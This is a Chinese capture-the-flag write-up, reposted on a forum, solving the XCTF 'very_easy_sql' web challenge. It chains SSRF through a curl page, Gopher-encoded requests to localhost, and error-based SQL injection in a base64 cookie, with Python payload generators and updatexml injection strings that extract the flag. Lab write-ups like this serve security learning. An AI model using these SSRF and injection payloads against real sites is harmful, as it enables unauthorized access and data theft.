首页 最新 热门 推荐

  • 首页
  • 最新
  • 热门
  • 推荐

攻防世界 - Web - Level 3 | very_easy_sql

  • 25-02-16 18:20
  • 2303
  • 6834
blog.csdn.net

关注这个靶场的其它相关笔记:攻防世界(XCTF) —— 靶场笔记合集-CSDN博客

0x01:考点速览

本关考察的是 SSRF 漏洞,需要我们结合 Gopher 协议利用服务端进行越权 SQL 注入。考点不少,总结一下主要有以下几点:

  • SSRF 漏洞 —— Gopher 协议的使用

  • HTTP 请求包转换为 Gopher 请求包

  • SQL 注入 —— Cookie 注入

0x02:Write UP

进入靶场,是一个登录框,下面一行提示的字符 “you are not an inner user, so we can not let you have identify~” ,既然考点是 SQL 注入,我们尝试输入一些东西,看看能不能触发漏洞:

OK,没有任何提示,打开抓包工具,重放请求包,我们可以注意到如下两点:

一个是显示我们的 Cookie 被消除了,另外一个是一个 use.php 的页面,我们在靶场链接后拼接 /use.php 进入该页面:

“url you want to curl”,我们知道 curl 命令是用来对服务器发起请求的。联想到靶场首页的提示 “you are not an inner user, so we can not let you have identify~” —— 你不是内部用户,所以我们不能让你拥有身份。

我们大致可以确定攻击方向,利用 use.php 页面中的 curl 命令进行 SSRF 攻击,攻击的目标就是靶场首页的登录框。

确定了思路,下面就开始实施吧,这里需要拓展一个 Gopher 协议,协议的简介如下:

我们现在靶场首页的登录框中,随便输入一组用户名加密码,点击 Submit,并抓取 POST 请求包,我抓取的内容如下:

  1.  POST / HTTP/1.1
  2.  Host: 61.147.171.105:65176
  3.  Content-Length: 20
  4.  Cache-Control: max-age=0
  5.  Upgrade-Insecure-Requests: 1
  6.  Origin: http://61.147.171.105:65176
  7.  Content-Type: application/x-www-form-urlencoded
  8.  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
  9.  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  10.  Referer: http://61.147.171.105:65176/
  11.  Accept-Encoding: gzip, deflate
  12.  Accept-Language: zh-CN,zh;q=0.9
  13.  Cookie: PHPSESSID=78dp0ee6kimm21f8ik5eua4431
  14.  Connection: close
  15.  
  16.  uname=123&passwd=123

而我们构造 Gopher 请求包其实用不了这么多数据,精简后的请求包如下:

  1.  POST / HTTP/1.1
  2.  Host: 61.147.171.105:65176
  3.  Content-Length: 20
  4.  Content-Type: application/x-www-form-urlencoded
  5.  
  6.  uname=123&passwd=123

下面继续深入思考一下,我们是利用目标靶场的 use.php 页面发起的请求,所以对于 use.php 而言,靶场首页的登录框,对他而言其实应该是在本地的,所以我们这里的 HOST 需要改为 127.0.0.1:80。

下面就是将更改后的请求包转换为 Gopher 协议的请求了,当然,同上,我们请求的目标 IP 地址和端口也是 127.0.0.1:80,转换的 Python 代码如下:

  1.  import urllib.parse
  2.  
  3.  host = "127.0.0.1:80"
  4.  payload = "uname=123&passwd=123" # 请求包中的 payload
  5.  
  6.  template = """\
  7.  POST / HTTP/1.1
  8.  Host: {}
  9.  Content-Length: {}
  10.  Content-Type: application/x-www-form-urlencoded
  11.  
  12.  {}
  13.  """.format(host, len(payload), payload)
  14.  
  15.  
  16.  def gopher_data(string):
  17.      """
  18.     :param string: 待转换的请求包
  19.     :return:
  20.     """
  21.      encode_result = urllib.parse.quote(string)  # 进行 url 编码
  22.      # 回车 \n -> url 编码后 -> %0A -> 将 %0A 替换为 %0D%0A; 数据包模板末尾有一个换行,就不用额外添加 %0D%0A 了
  23.      return "gopher://{}/_{}".format(host, encode_result.replace("%0A","%0D%0A"))
  24.  ​
  25.  print(gopher_data(template))

输出的 Payload 如下:

 gopher://127.0.0.1:80/_POST%20/%20HTTP/1.1%0D%0AHost%3A%20127.0.0.1%3A80%0D%0AContent-Length%3A%2020%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0A%0D%0Auname%3D123%26passwd%3D123%0D%0A

将 Payload 黏贴到 use.php 中,并点击 submit 可以看到我们成功请求了目标网页,并且还有返回信息:

这里我们将请求包中的 uname 和 passwd 替换为弱口令 admin,再次生成 Payload 后发起请求,可以看到如下内容:

 gopher://127.0.0.1:80/_POST%20/%20HTTP/1.1%0D%0AHost%3A%20127.0.0.1%3A80%0D%0AContent-Length%3A%2024%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0A%0D%0Auname%3Dadmin%26passwd%3Dadmin%0D%0A

OK,熟悉的 “this_is_your_cookie”,不同之前的 “delete”,这次请求算是成功了,我们将该 Cookie 的值复制一下,进行一下解码:

再联想一下 SQL 注入,注入点这不就出来了,既然注入点在 Cookie 这里,那携带 Payload 其实也不需要了(Payload 本来就是为了去后端查表,验证用户是否是正规用户的,Cookie 也有这个作用)。

所以,修改后的请求包模板如下:

  1.  POST / HTTP/1.1
  2.  Host: {}
  3.  Content-Length: 0
  4.  Content-Type: application/x-www-form-urlencoded
  5.  Cookie: this_is_your_cookie={}

相应的,生成攻击载荷的代码如下:

 
  1. import base64
  2.  import urllib.parse
  3.  
  4.  host = "127.0.0.1:80"
  5.  
  6.  template = """\
  7.  POST / HTTP/1.1
  8.  Host: {}
  9.  Content-Length: 0
  10.  Content-Type: application/x-www-form-urlencoded
  11.  Cookie: this_is_your_cookie={}
  12.  """
  13.  ​
  14.  def gopher_data(string):
  15.      """
  16.     :param string: 待转换的请求包
  17.     :return:
  18.     """
  19.      encode_result = urllib.parse.quote(string)  # 进行 url 编码
  20.      # 回车 \n -> url 编码后 -> %0A -> 将 %0A 替换为 %0D%0A; 数据包模板末尾有一个换行,就不用额外添加 %0D%0A 了
  21.      return "gopher://{}/_{}".format(host, encode_result.replace("%0A","%0D%0A"))
  22.  
  23.  def create_payload(payload):
  24.      global template
  25.      payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8') # 对 Payload 进行 Base64 编码
  26.      template = template.format("host",payload)
  27.      return gopher_data(template)
  28.  
  29.      
  30.  if __name__ == "__main__":
  31.      payload = input("Input Payload: ")
  32.      print(create_payload(payload))

利用此脚本,即可生成对应的 gopher 协议脚本,比如,我们测试用户名为 admin':

  1.  Input Payload: admin'
  2.  gopher://127.0.0.1:80/_POST%20/%20HTTP/1.1%0D%0AHost%3A%20host%0D%0AContent-Length%3A%200%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0ACookie%3A%20this_is_your_cookie%3DYWRtaW4n%0D%0A

探测出后端的 SQL 攻击模板为:

 admin') 攻击代码 #

而且既然它会报错,那我们直接使用报错注入即可,下面我就简单的写一下测试的 SQL 语句,具体的 Payload 拿上面的 Python 脚本即可生成:

  1.  获取当前数据库中存在的表名:
  2.  Input Payload: admin') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #
  3.  关键报错:Issue with your mysql: XPATH syntax error: '~emails,flag,referers,uagents,us' -> 提取关键信息: flag 表
  4.  
  5.  获取 flag 表中的字段名:
  6.  Input Payload: admin') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="flag"),0x7e),1) #
  7.  关键报错:Issue with your mysql: XPATH syntax error: '~flag~'
  8.  
  9.  
  10.  获取 flag 表中的 flag 字段的所有信息:
  11.  Input Payload: admin') and updatexml(1,concat(0x7e,(select group_concat(flag) from flag),0x7e),1) #
  12.  关键报错:Issue with your mysql: XPATH syntax error: '~cyberpeace{a0e9c720fecbd276d9f6'
  13.  
  14.  获取 flag 剩余内容,使用 mid 进行截取:
  15.  Input Payload: admin') and updatexml(1,concat(0x7e,(select mid(group_concat(flag),20,50) from flag),0x7e),1) #
  16.  关键报错:Issue with your mysql: XPATH syntax error: '~fecbd276d9f611e262249a87}~'
  17.  
  18.  拼接后的 flag:cyberpeace{a0e9c720fecbd276d9f611e262249a87}

0x03:参考链接

SSRF利用协议中的万金油——Gopher_dict协议-CSDN博客文章浏览阅读4.5k次,点赞7次,收藏38次。SSRF利用协议中的万金油——Gopher_dict协议http://iyenn.com/rec/1646257.html
SSRF防护绕过思路与Gopher利用浅析 - 先知社区先知社区,先知安全技术社区https://xz.aliyun.com/t/14086?time__1311=mqmx9DBG0QYxyDBqDTeeuut5LhENWYD&alichlgref=https%3A%2F%2Fcn.bing.com%2F
注:本文转载自blog.csdn.net的Blue17 :: Hack3rX的文章"https://blog.csdn.net/m0_73360524/article/details/144662603"。版权归原作者所有,此博客不拥有其著作权,亦不承担相应法律责任。如有侵权,请联系我们删除。
复制链接
复制链接
相关推荐
发表评论
登录后才能发表评论和回复 注册

/ 登录

评论记录:

未查询到任何数据!
回复评论:

分类栏目

后端 (14832) 前端 (14280) 移动开发 (3760) 编程语言 (3851) Java (3904) Python (3298) 人工智能 (10119) AIGC (2810) 大数据 (3499) 数据库 (3945) 数据结构与算法 (3757) 音视频 (2669) 云原生 (3145) 云平台 (2965) 前沿技术 (2993) 开源 (2160) 小程序 (2860) 运维 (2533) 服务器 (2698) 操作系统 (2325) 硬件开发 (2491) 嵌入式 (2955) 微软技术 (2769) 软件工程 (2056) 测试 (2865) 网络空间安全 (2948) 网络与通信 (2797) 用户体验设计 (2592) 学习和成长 (2593) 搜索 (2744) 开发工具 (7108) 游戏 (2829) HarmonyOS (2935) 区块链 (2782) 数学 (3112) 3C硬件 (2759) 资讯 (2909) Android (4709) iOS (1850) 代码人生 (3043) 阅读 (2841)

热门文章

101
推荐
关于我们 隐私政策 免责声明 联系我们
Copyright © 2020-2025 蚁人论坛 (iYenn.com) All Rights Reserved.
Scroll to Top